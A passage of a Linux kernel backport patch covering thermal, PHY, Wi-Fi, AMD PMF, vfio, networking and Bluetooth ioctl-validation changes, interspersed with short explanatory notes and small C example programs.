++	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_gearbox_temp_get(struct thermal_zone_device *tzdev,
+@@ -414,6 +530,11 @@ static struct thermal_zone_device_ops mlxsw_thermal_gearbox_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_gearbox_temp_get,
++	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
++	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
++	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
++	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
++	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_get_max_state(struct thermal_cooling_device *cdev,
+@@ -495,8 +616,7 @@ mlxsw_thermal_module_tz_init(struct mlxsw_thermal_module *module_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-module%d",
+ 			 module_tz->module + 1);
+-	module_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
+-							module_tz->trips,
++	module_tz->tzdev = thermal_zone_device_register(tz_name,
+ 							MLXSW_THERMAL_NUM_TRIPS,
+ 							MLXSW_THERMAL_TRIP_MASK,
+ 							module_tz,
+@@ -540,8 +660,6 @@ mlxsw_thermal_module_init(struct device *dev, struct mlxsw_core *core,
+ 	module_tz->parent = thermal;
+ 	memcpy(module_tz->trips, default_thermal_trips,
+ 	       sizeof(thermal->trips));
+-	memcpy(module_tz->cooling_states, default_cooling_states,
+-	       sizeof(thermal->cooling_states));
+ 	/* Initialize all trip point. */
+ 	mlxsw_thermal_module_trips_reset(module_tz);
+ 	/* Read module temperature and thresholds. */
+@@ -637,8 +755,7 @@ mlxsw_thermal_gearbox_tz_init(struct mlxsw_thermal_module *gearbox_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-gearbox%d",
+ 			 gearbox_tz->module + 1);
+-	gearbox_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
+-						gearbox_tz->trips,
++	gearbox_tz->tzdev = thermal_zone_device_register(tz_name,
+ 						MLXSW_THERMAL_NUM_TRIPS,
+ 						MLXSW_THERMAL_TRIP_MASK,
+ 						gearbox_tz,
+@@ -695,8 +812,6 @@ mlxsw_thermal_gearboxes_init(struct device *dev, struct mlxsw_core *core,
+ 		gearbox_tz = &area->tz_gearbox_arr[i];
+ 		memcpy(gearbox_tz->trips, default_thermal_trips,
+ 		       sizeof(thermal->trips));
+-		memcpy(gearbox_tz->cooling_states, default_cooling_states,
+-		       sizeof(thermal->cooling_states));
+ 		gearbox_tz->module = i;
+ 		gearbox_tz->parent = thermal;
+ 		gearbox_tz->slot_index = area->slot_index;
+@@ -812,7 +927,6 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 	thermal->core = core;
+ 	thermal->bus_info = bus_info;
+ 	memcpy(thermal->trips, default_thermal_trips, sizeof(thermal->trips));
+-	memcpy(thermal->cooling_states, default_cooling_states, sizeof(thermal->cooling_states));
+ 	thermal->line_cards[0].slot_index = 0;
+ 
+ 	err = mlxsw_reg_query(thermal->core, MLXSW_REG(mfcr), mfcr_pl);
+@@ -862,8 +976,7 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 				 MLXSW_THERMAL_SLOW_POLL_INT :
+ 				 MLXSW_THERMAL_POLL_INT;
+ 
+-	thermal->tzdev = thermal_zone_device_register_with_trips("mlxsw",
+-						      thermal->trips,
++	thermal->tzdev = thermal_zone_device_register("mlxsw",
+ 						      MLXSW_THERMAL_NUM_TRIPS,
+ 						      MLXSW_THERMAL_TRIP_MASK,
+ 						      thermal,
+diff --git a/drivers/net/phy/mscc/mscc.h b/drivers/net/phy/mscc/mscc.h
+index a50235fdf7d99..055e4ca5b3b5c 100644
+--- a/drivers/net/phy/mscc/mscc.h
++++ b/drivers/net/phy/mscc/mscc.h
+@@ -179,6 +179,7 @@ enum rgmii_clock_delay {
+ #define VSC8502_RGMII_CNTL		  20
+ #define VSC8502_RGMII_RX_DELAY_MASK	  0x0070
+ #define VSC8502_RGMII_TX_DELAY_MASK	  0x0007
++#define VSC8502_RGMII_RX_CLK_DISABLE	  0x0800
+ 
+ #define MSCC_PHY_WOL_LOWER_MAC_ADDR	  21
+ #define MSCC_PHY_WOL_MID_MAC_ADDR	  22
+diff --git a/drivers/net/phy/mscc/mscc_main.c b/drivers/net/phy/mscc/mscc_main.c
+index f778e4f8b5080..7bd940baec595 100644
+--- a/drivers/net/phy/mscc/mscc_main.c
++++ b/drivers/net/phy/mscc/mscc_main.c
+@@ -527,14 +527,27 @@ out_unlock:
+  *  * 2.0 ns (which causes the data to be sampled at exactly half way between
+  *    clock transitions at 1000 Mbps) if delays should be enabled
+  */
+-static int vsc85xx_rgmii_set_skews(struct phy_device *phydev, u32 rgmii_cntl,
+-				   u16 rgmii_rx_delay_mask,
+-				   u16 rgmii_tx_delay_mask)
++static int vsc85xx_update_rgmii_cntl(struct phy_device *phydev, u32 rgmii_cntl,
++				     u16 rgmii_rx_delay_mask,
++				     u16 rgmii_tx_delay_mask)
+ {
+ 	u16 rgmii_rx_delay_pos = ffs(rgmii_rx_delay_mask) - 1;
+ 	u16 rgmii_tx_delay_pos = ffs(rgmii_tx_delay_mask) - 1;
+ 	u16 reg_val = 0;
+-	int rc;
++	u16 mask = 0;
++	int rc = 0;
++
++	/* For traffic to pass, the VSC8502 family needs the RX_CLK disable bit
++	 * to be unset for all PHY modes, so do that as part of the paged
++	 * register modification.
++	 * For some family members (like VSC8530/31/40/41) this bit is reserved
++	 * and read-only, and the RX clock is enabled by default.
++	 */
++	if (rgmii_cntl == VSC8502_RGMII_CNTL)
++		mask |= VSC8502_RGMII_RX_CLK_DISABLE;
++
++	if (phy_interface_is_rgmii(phydev))
++		mask |= rgmii_rx_delay_mask | rgmii_tx_delay_mask;
+ 
+ 	mutex_lock(&phydev->lock);
+ 
+@@ -545,10 +558,9 @@ static int vsc85xx_rgmii_set_skews(struct phy_device *phydev, u32 rgmii_cntl,
+ 	    phydev->interface == PHY_INTERFACE_MODE_RGMII_ID)
+ 		reg_val |= RGMII_CLK_DELAY_2_0_NS << rgmii_tx_delay_pos;
+ 
+-	rc = phy_modify_paged(phydev, MSCC_PHY_PAGE_EXTENDED_2,
+-			      rgmii_cntl,
+-			      rgmii_rx_delay_mask | rgmii_tx_delay_mask,
+-			      reg_val);
++	if (mask)
++		rc = phy_modify_paged(phydev, MSCC_PHY_PAGE_EXTENDED_2,
++				      rgmii_cntl, mask, reg_val);
+ 
+ 	mutex_unlock(&phydev->lock);
+ 
+@@ -557,19 +569,11 @@ static int vsc85xx_rgmii_set_skews(struct phy_device *phydev, u32 rgmii_cntl,
+ 
+ static int vsc85xx_default_config(struct phy_device *phydev)
+ {
+-	int rc;
+-
+ 	phydev->mdix_ctrl = ETH_TP_MDI_AUTO;
+ 
+-	if (phy_interface_mode_is_rgmii(phydev->interface)) {
+-		rc = vsc85xx_rgmii_set_skews(phydev, VSC8502_RGMII_CNTL,
+-					     VSC8502_RGMII_RX_DELAY_MASK,
+-					     VSC8502_RGMII_TX_DELAY_MASK);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	return 0;
++	return vsc85xx_update_rgmii_cntl(phydev, VSC8502_RGMII_CNTL,
++					 VSC8502_RGMII_RX_DELAY_MASK,
++					 VSC8502_RGMII_TX_DELAY_MASK);
+ }
+ 
+ static int vsc85xx_get_tunable(struct phy_device *phydev,
+@@ -1766,13 +1770,11 @@ static int vsc8584_config_init(struct phy_device *phydev)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (phy_interface_is_rgmii(phydev)) {
+-		ret = vsc85xx_rgmii_set_skews(phydev, VSC8572_RGMII_CNTL,
+-					      VSC8572_RGMII_RX_DELAY_MASK,
+-					      VSC8572_RGMII_TX_DELAY_MASK);
+-		if (ret)
+-			return ret;
+-	}
++	ret = vsc85xx_update_rgmii_cntl(phydev, VSC8572_RGMII_CNTL,
++					VSC8572_RGMII_RX_DELAY_MASK,
++					VSC8572_RGMII_TX_DELAY_MASK);
++	if (ret)
++		return ret;
+ 
+ 	ret = genphy_soft_reset(phydev);
+ 	if (ret)
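
The rework funnels both callers through one phy_modify_paged() call and
builds the mask conditionally: the RX_CLK disable bit is always cleared on
VSC8502, while the delay fields are only touched when the interface is
RGMII. A runnable sketch of the masked read-modify-write such helpers
perform (register values illustrative):

#include <stdint.h>
#include <stdio.h>

/* reg = (reg & ~mask) | (val & mask), the core of phy_modify() */
static uint16_t reg_modify(uint16_t reg, uint16_t mask, uint16_t val)
{
	return (reg & ~mask) | (val & mask);
}

#define RX_CLK_DISABLE	0x0800
#define RX_DELAY_MASK	0x0070
#define TX_DELAY_MASK	0x0007

int main(void)
{
	uint16_t reg = 0x0877;	/* clock gated, some delays programmed */
	uint16_t mask = RX_CLK_DISABLE;	/* always clear the clock gate */
	int is_rgmii = 0;	/* e.g. plain MII: leave the delay bits alone */

	if (is_rgmii)
		mask |= RX_DELAY_MASK | TX_DELAY_MASK;

	reg = reg_modify(reg, mask, 0);	/* val = 0: clear the masked bits */
	printf("reg = 0x%04x (delays untouched, RX clock enabled)\n", reg);
	return 0;
}
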
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h b/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h
+index df0833890e55a..8a613e150a024 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/api/d3.h
+@@ -767,7 +767,7 @@ struct iwl_wowlan_status_v12 {
+ } __packed; /* WOWLAN_STATUSES_RSP_API_S_VER_12 */
+ 
+ /**
+- * struct iwl_wowlan_info_notif - WoWLAN information notification
++ * struct iwl_wowlan_info_notif_v1 - WoWLAN information notification
+  * @gtk: GTK data
+  * @igtk: IGTK data
+  * @replay_ctr: GTK rekey replay counter
+@@ -785,7 +785,7 @@ struct iwl_wowlan_status_v12 {
+  * @station_id: station id
+  * @reserved2: reserved
+  */
+-struct iwl_wowlan_info_notif {
++struct iwl_wowlan_info_notif_v1 {
+ 	struct iwl_wowlan_gtk_status_v3 gtk[WOWLAN_GTK_KEYS_NUM];
+ 	struct iwl_wowlan_igtk_status igtk[WOWLAN_IGTK_KEYS_NUM];
+ 	__le64 replay_ctr;
+@@ -803,6 +803,39 @@ struct iwl_wowlan_info_notif {
+ 	u8 reserved2[2];
+ } __packed; /* WOWLAN_INFO_NTFY_API_S_VER_1 */
+ 
++/**
++ * struct iwl_wowlan_info_notif - WoWLAN information notification
++ * @gtk: GTK data
++ * @igtk: IGTK data
++ * @replay_ctr: GTK rekey replay counter
++ * @pattern_number: number of the matched patterns
++ * @reserved1: reserved
++ * @qos_seq_ctr: QoS sequence counters to use next
++ * @wakeup_reasons: wakeup reasons, see &enum iwl_wowlan_wakeup_reason
++ * @num_of_gtk_rekeys: number of GTK rekeys
++ * @transmitted_ndps: number of transmitted neighbor discovery packets
++ * @received_beacons: number of received beacons
++ * @tid_tear_down: bit mask of tids whose BA sessions were closed
++ *	in suspend state
++ * @station_id: station id
++ * @reserved2: reserved
++ */
++struct iwl_wowlan_info_notif {
++	struct iwl_wowlan_gtk_status_v3 gtk[WOWLAN_GTK_KEYS_NUM];
++	struct iwl_wowlan_igtk_status igtk[WOWLAN_IGTK_KEYS_NUM];
++	__le64 replay_ctr;
++	__le16 pattern_number;
++	__le16 reserved1;
++	__le16 qos_seq_ctr[8];
++	__le32 wakeup_reasons;
++	__le32 num_of_gtk_rekeys;
++	__le32 transmitted_ndps;
++	__le32 received_beacons;
++	u8 tid_tear_down;
++	u8 station_id;
++	u8 reserved2[2];
++} __packed; /* WOWLAN_INFO_NTFY_API_S_VER_2 */
++
+ /**
+  * struct iwl_wowlan_wake_pkt_notif - WoWLAN wake packet notification
+  * @wake_packet_length: wakeup packet length
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index bbdda3e1ff3fc..c876e81437fee 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -2011,6 +2011,12 @@ static void iwl_mvm_parse_wowlan_info_notif(struct iwl_mvm *mvm,
+ {
+ 	u32 i;
+ 
++	if (!data) {
++		IWL_ERR(mvm, "iwl_wowlan_info_notif data is NULL\n");
++		status = NULL;
++		return;
++	}
++
+ 	if (len < sizeof(*data)) {
+ 		IWL_ERR(mvm, "Invalid WoWLAN info notification!\n");
+ 		status = NULL;
+@@ -2698,10 +2704,15 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 	struct iwl_d3_data *d3_data = data;
+ 	u32 len;
+ 	int ret;
++	int wowlan_info_ver = iwl_fw_lookup_notif_ver(mvm->fw,
++						      PROT_OFFLOAD_GROUP,
++						      WOWLAN_INFO_NOTIFICATION,
++						      IWL_FW_CMD_VER_UNKNOWN);
++
+ 
+ 	switch (WIDE_ID(pkt->hdr.group_id, pkt->hdr.cmd)) {
+ 	case WIDE_ID(PROT_OFFLOAD_GROUP, WOWLAN_INFO_NOTIFICATION): {
+-		struct iwl_wowlan_info_notif *notif = (void *)pkt->data;
++		struct iwl_wowlan_info_notif *notif;
+ 
+ 		if (d3_data->notif_received & IWL_D3_NOTIF_WOWLAN_INFO) {
+ 			/* We might get two notifications due to dual bss */
+@@ -2710,10 +2721,32 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 			break;
+ 		}
+ 
++		if (wowlan_info_ver < 2) {
++			struct iwl_wowlan_info_notif_v1 *notif_v1 = (void *)pkt->data;
++
++			notif = kmemdup(notif_v1,
++					offsetofend(struct iwl_wowlan_info_notif,
++						    received_beacons),
++					GFP_ATOMIC);
++
++			if (!notif)
++				return false;
++
++			notif->tid_tear_down = notif_v1->tid_tear_down;
++			notif->station_id = notif_v1->station_id;
++
++		} else {
++			notif = (void *)pkt->data;
++		}
++
+ 		d3_data->notif_received |= IWL_D3_NOTIF_WOWLAN_INFO;
+ 		len = iwl_rx_packet_payload_len(pkt);
+ 		iwl_mvm_parse_wowlan_info_notif(mvm, notif, d3_data->status,
+ 						len);
++
++		if (wowlan_info_ver < 2)
++			kfree(notif);
++
+ 		if (d3_data->status &&
+ 		    d3_data->status->wakeup_reasons & IWL_WOWLAN_WAKEUP_REASON_HAS_WAKEUP_PKT)
+ 			/* We are supposed to get also wake packet notif */
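
The driver keys on the firmware's notification version: for v1 it
kmemdup()s the layout-compatible prefix into the v2 struct and then copies
the trailing fields by hand, because the new member shifted their offsets.
A runnable sketch of that upgrade pattern (field names simplified, not the
real iwlwifi layout):

#include <inttypes.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define offsetofend(type, member) \
	(offsetof(type, member) + sizeof(((type *)0)->member))

struct notif_v1 {	/* old firmware layout */
	uint32_t wakeup_reasons;
	uint32_t received_beacons;
	uint8_t  tid_tear_down;
	uint8_t  station_id;
};

struct notif_v2 {	/* same prefix, one new field in the middle */
	uint32_t wakeup_reasons;
	uint32_t received_beacons;
	uint32_t new_field;	/* illustrative v2 addition */
	uint8_t  tid_tear_down;
	uint8_t  station_id;
};

static struct notif_v2 *upgrade_v1(const struct notif_v1 *v1)
{
	struct notif_v2 *v2 = calloc(1, sizeof(*v2));

	if (!v2)
		return NULL;
	/* the layouts agree up to and including received_beacons */
	memcpy(v2, v1, offsetofend(struct notif_v2, received_beacons));
	/* fields after the insertion point moved: copy them one by one */
	v2->tid_tear_down = v1->tid_tear_down;
	v2->station_id = v1->station_id;
	return v2;
}

int main(void)
{
	struct notif_v1 v1 = { .wakeup_reasons = 0x8, .received_beacons = 3,
			       .tid_tear_down = 1, .station_id = 2 };
	struct notif_v2 *v2 = upgrade_v1(&v1);

	if (v2)
		printf("v2: reasons=%" PRIu32 " beacons=%" PRIu32 " sta=%d\n",
		       v2->wakeup_reasons, v2->received_beacons,
		       v2->station_id);
	free(v2);
	return 0;
}
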
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c.c b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+index 67653b3e1a356..3109114cec6ff 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+@@ -1484,18 +1484,19 @@ static void rtw8852c_5m_mask(struct rtw89_dev *rtwdev,
+ 			     const struct rtw89_chan *chan,
+ 			     enum rtw89_phy_idx phy_idx)
+ {
+-	u8 pri_ch = chan->primary_channel;
++	u8 pri_ch = chan->pri_ch_idx;
+ 	bool mask_5m_low;
+ 	bool mask_5m_en;
+ 
+ 	switch (chan->band_width) {
+ 	case RTW89_CHANNEL_WIDTH_40:
+ 		mask_5m_en = true;
+-		mask_5m_low = pri_ch == 2;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWER;
+ 		break;
+ 	case RTW89_CHANNEL_WIDTH_80:
+-		mask_5m_en = ((pri_ch == 3) || (pri_ch == 4));
+-		mask_5m_low = pri_ch == 4;
++		mask_5m_en = pri_ch == RTW89_SC_20_UPMOST ||
++			     pri_ch == RTW89_SC_20_LOWEST;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWEST;
+ 		break;
+ 	default:
+ 		mask_5m_en = false;
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index 0acc0b6221290..dc9803e1a4b9b 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -245,24 +245,29 @@ static const struct pci_device_id pmf_pci_ids[] = {
+ 	{ }
+ };
+ 
+-int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev)
++static void amd_pmf_set_dram_addr(struct amd_pmf_dev *dev)
+ {
+ 	u64 phys_addr;
+ 	u32 hi, low;
+ 
+-	INIT_DELAYED_WORK(&dev->work_buffer, amd_pmf_get_metrics);
++	phys_addr = virt_to_phys(dev->buf);
++	hi = phys_addr >> 32;
++	low = phys_addr & GENMASK(31, 0);
++
++	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_HIGH, 0, hi, NULL);
++	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_LOW, 0, low, NULL);
++}
+ 
++int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev)
++{
+ 	/* Get Metrics Table Address */
+ 	dev->buf = kzalloc(sizeof(dev->m_table), GFP_KERNEL);
+ 	if (!dev->buf)
+ 		return -ENOMEM;
+ 
+-	phys_addr = virt_to_phys(dev->buf);
+-	hi = phys_addr >> 32;
+-	low = phys_addr & GENMASK(31, 0);
++	INIT_DELAYED_WORK(&dev->work_buffer, amd_pmf_get_metrics);
+ 
+-	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_HIGH, 0, hi, NULL);
+-	amd_pmf_send_cmd(dev, SET_DRAM_ADDR_LOW, 0, low, NULL);
++	amd_pmf_set_dram_addr(dev);
+ 
+ 	/*
+ 	 * Start collecting the metrics data after a small delay
+@@ -273,6 +278,18 @@ int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev)
+ 	return 0;
+ }
+ 
++static int amd_pmf_resume_handler(struct device *dev)
++{
++	struct amd_pmf_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->buf)
++		amd_pmf_set_dram_addr(pdev);
++
++	return 0;
++}
++
++static DEFINE_SIMPLE_DEV_PM_OPS(amd_pmf_pm, NULL, amd_pmf_resume_handler);
++
+ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ {
+ 	int ret;
+@@ -414,6 +431,7 @@ static struct platform_driver amd_pmf_driver = {
+ 		.name = "amd-pmf",
+ 		.acpi_match_table = amd_pmf_acpi_ids,
+ 		.dev_groups = amd_pmf_driver_groups,
++		.pm = pm_sleep_ptr(&amd_pmf_pm),
+ 	},
+ 	.probe = amd_pmf_probe,
+ 	.remove = amd_pmf_remove,
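
Factoring out amd_pmf_set_dram_addr() lets the new resume handler re-send
the metrics-table address, which the firmware forgets across suspend. The
address itself is just a 64-bit physical address split into two 32-bit
mailbox writes; a runnable sketch of the split (the printf calls stand in
for amd_pmf_send_cmd()):

#include <inttypes.h>
#include <stdio.h>

/* GENMASK(31, 0) in the kernel is simply the low 32 bits. */
#define LOW32(x)	((uint32_t)((x) & 0xffffffffULL))
#define HIGH32(x)	((uint32_t)((x) >> 32))

static void send_dram_addr(uint64_t phys_addr)
{
	uint32_t hi = HIGH32(phys_addr);
	uint32_t low = LOW32(phys_addr);

	printf("SET_DRAM_ADDR_HIGH <- 0x%08" PRIx32 "\n", hi);
	printf("SET_DRAM_ADDR_LOW  <- 0x%08" PRIx32 "\n", low);
}

int main(void)
{
	uint64_t addr = 0x123456789abcdef0ULL;

	send_dram_addr(addr);	/* at probe */
	send_dram_addr(addr);	/* replayed by the resume handler */
	return 0;
}
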
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 7fa68dc4e938a..009ba186652ac 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -936,6 +936,11 @@ again:
+ 		if (ret)
+ 			goto pin_unwind;
+ 
++		if (!pfn_valid(phys_pfn)) {
++			ret = -EINVAL;
++			goto pin_unwind;
++		}
++
+ 		ret = vfio_add_to_pfn_list(dma, iova, phys_pfn);
+ 		if (ret) {
+ 			if (put_pfn(phys_pfn, dma->prot) && do_accounting)
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 20ca1613f2e3e..cc5ed2cf25f65 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -1567,6 +1567,16 @@ static inline void skb_copy_hash(struct sk_buff *to, const struct sk_buff *from)
+ 	to->l4_hash = from->l4_hash;
+ };
+ 
++static inline int skb_cmp_decrypted(const struct sk_buff *skb1,
++				    const struct sk_buff *skb2)
++{
++#ifdef CONFIG_TLS_DEVICE
++	return skb2->decrypted - skb1->decrypted;
++#else
++	return 0;
++#endif
++}
++
+ static inline void skb_copy_decrypted(struct sk_buff *to,
+ 				      const struct sk_buff *from)
+ {
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index 84f787416a54d..054d7911bfc9f 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -71,7 +71,6 @@ struct sk_psock_link {
+ };
+ 
+ struct sk_psock_work_state {
+-	struct sk_buff			*skb;
+ 	u32				len;
+ 	u32				off;
+ };
+@@ -105,7 +104,7 @@ struct sk_psock {
+ 	struct proto			*sk_proto;
+ 	struct mutex			work_mutex;
+ 	struct sk_psock_work_state	work_state;
+-	struct work_struct		work;
++	struct delayed_work		work;
+ 	struct rcu_work			rwork;
+ };
+ 
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index bf5654ce711ef..51857117ac099 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -249,6 +249,10 @@ struct inet_sock {
+ 	__be32			mc_addr;
+ 	struct ip_mc_socklist __rcu	*mc_list;
+ 	struct inet_cork_full	cork;
++	struct {
++		__u16 lo;
++		__u16 hi;
++	}			local_port_range;
+ };
+ 
+ #define IPCORK_OPT	1	/* ip-options has been held in ipcork.opt */
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 144bdfbb25afe..acec504c469a0 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -76,6 +76,7 @@ struct ipcm_cookie {
+ 	__be32			addr;
+ 	int			oif;
+ 	struct ip_options_rcu	*opt;
++	__u8			protocol;
+ 	__u8			ttl;
+ 	__s16			tos;
+ 	char			priority;
+@@ -96,6 +97,7 @@ static inline void ipcm_init_sk(struct ipcm_cookie *ipcm,
+ 	ipcm->sockc.tsflags = inet->sk.sk_tsflags;
+ 	ipcm->oif = READ_ONCE(inet->sk.sk_bound_dev_if);
+ 	ipcm->addr = inet->inet_saddr;
++	ipcm->protocol = inet->inet_num;
+ }
+ 
+ #define IPCB(skb) ((struct inet_skb_parm*)((skb)->cb))
+@@ -340,7 +342,8 @@ static inline u64 snmp_fold_field64(void __percpu *mib, int offt, size_t syncp_o
+ 	} \
+ }
+ 
+-void inet_get_local_port_range(struct net *net, int *low, int *high);
++void inet_get_local_port_range(const struct net *net, int *low, int *high);
++void inet_sk_get_local_port_range(const struct sock *sk, int *low, int *high);
+ 
+ #ifdef CONFIG_SYSCTL
+ static inline bool inet_is_local_reserved_port(struct net *net, unsigned short port)
+diff --git a/include/net/page_pool.h b/include/net/page_pool.h
+index 813c93499f201..ad0bafc877d48 100644
+--- a/include/net/page_pool.h
++++ b/include/net/page_pool.h
+@@ -383,22 +383,4 @@ static inline void page_pool_nid_changed(struct page_pool *pool, int new_nid)
+ 		page_pool_update_nid(pool, new_nid);
+ }
+ 
+-static inline void page_pool_ring_lock(struct page_pool *pool)
+-	__acquires(&pool->ring.producer_lock)
+-{
+-	if (in_serving_softirq())
+-		spin_lock(&pool->ring.producer_lock);
+-	else
+-		spin_lock_bh(&pool->ring.producer_lock);
+-}
+-
+-static inline void page_pool_ring_unlock(struct page_pool *pool)
+-	__releases(&pool->ring.producer_lock)
+-{
+-	if (in_serving_softirq())
+-		spin_unlock(&pool->ring.producer_lock);
+-	else
+-		spin_unlock_bh(&pool->ring.producer_lock);
+-}
+-
+ #endif /* _NET_PAGE_POOL_H */
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 5b70b241ce71b..0744717f5caa7 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -1467,6 +1467,8 @@ static inline void tcp_adjust_rcv_ssthresh(struct sock *sk)
+ }
+ 
+ void tcp_cleanup_rbuf(struct sock *sk, int copied);
++void __tcp_cleanup_rbuf(struct sock *sk, int copied);
++
+ 
+ /* We provision sk_rcvbuf around 200% of sk_rcvlowat.
+  * If 87.5 % (7/8) of the space has been consumed, we want to override
+@@ -2291,6 +2293,14 @@ int tcp_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool restore);
+ void tcp_bpf_clone(const struct sock *sk, struct sock *newsk);
+ #endif /* CONFIG_BPF_SYSCALL */
+ 
++#ifdef CONFIG_INET
++void tcp_eat_skb(struct sock *sk, struct sk_buff *skb);
++#else
++static inline void tcp_eat_skb(struct sock *sk, struct sk_buff *skb)
++{
++}
++#endif
++
+ int tcp_bpf_sendmsg_redir(struct sock *sk, bool ingress,
+ 			  struct sk_msg *msg, u32 bytes, int flags);
+ #endif /* CONFIG_NET_SOCK_MSG */
+diff --git a/include/net/tls.h b/include/net/tls.h
+index 154949c7b0c88..c36bf4c50027e 100644
+--- a/include/net/tls.h
++++ b/include/net/tls.h
+@@ -124,6 +124,7 @@ struct tls_strparser {
+ 	u32 mark : 8;
+ 	u32 stopped : 1;
+ 	u32 copy_mode : 1;
++	u32 mixed_decrypted : 1;
+ 	u32 msg_ready : 1;
+ 
+ 	struct strp_msg stm;
+diff --git a/include/uapi/linux/in.h b/include/uapi/linux/in.h
+index 07a4cb149305b..e682ab628dfa6 100644
+--- a/include/uapi/linux/in.h
++++ b/include/uapi/linux/in.h
+@@ -162,6 +162,8 @@ struct in_addr {
+ #define MCAST_MSFILTER			48
+ #define IP_MULTICAST_ALL		49
+ #define IP_UNICAST_IF			50
++#define IP_LOCAL_PORT_RANGE		51
++#define IP_PROTOCOL			52
+ 
+ #define MCAST_EXCLUDE	0
+ #define MCAST_INCLUDE	1
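
From userspace, IP_LOCAL_PORT_RANGE narrows the ephemeral port range per
socket. In the upstream change this backport tracks, the option value is a
single u32 with the low bound in bits 0-15 and the high bound in bits
16-31; a usage sketch under that assumption (on kernels without this patch
the call fails with ENOPROTOOPT):

#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef IP_LOCAL_PORT_RANGE
#define IP_LOCAL_PORT_RANGE 51	/* matches the uapi value added above */
#endif

int main(void)
{
	int fd = socket(AF_INET, SOCK_STREAM, 0);
	/* low bound in bits 0-15, high bound in bits 16-31 */
	uint32_t range = 40000 | (40100u << 16);

	if (fd < 0)
		return 1;
	if (setsockopt(fd, IPPROTO_IP, IP_LOCAL_PORT_RANGE,
		       &range, sizeof(range)) < 0)
		perror("setsockopt(IP_LOCAL_PORT_RANGE)");
	else
		puts("ephemeral ports for this socket: 40000-40100");
	close(fd);
	return 0;
}
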
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index f597fe0db9f8f..1d249d839819d 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -987,6 +987,34 @@ static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
+ 
+ 	BT_DBG("cmd %x arg %lx", cmd, arg);
+ 
++	/* Make sure the cmd is valid before doing anything */
++	switch (cmd) {
++	case HCIGETDEVLIST:
++	case HCIGETDEVINFO:
++	case HCIGETCONNLIST:
++	case HCIDEVUP:
++	case HCIDEVDOWN:
++	case HCIDEVRESET:
++	case HCIDEVRESTAT:
++	case HCISETSCAN:
++	case HCISETAUTH:
++	case HCISETENCRYPT:
++	case HCISETPTYPE:
++	case HCISETLINKPOL:
++	case HCISETLINKMODE:
++	case HCISETACLMTU:
++	case HCISETSCOMTU:
++	case HCIINQUIRY:
++	case HCISETRAW:
++	case HCIGETCONNINFO:
++	case HCIGETAUTHINFO:
++	case HCIBLOCKADDR:
++	case HCIUNBLOCKADDR:
++		break;
++	default:
++		return -ENOIOCTLCMD;
++	}
++
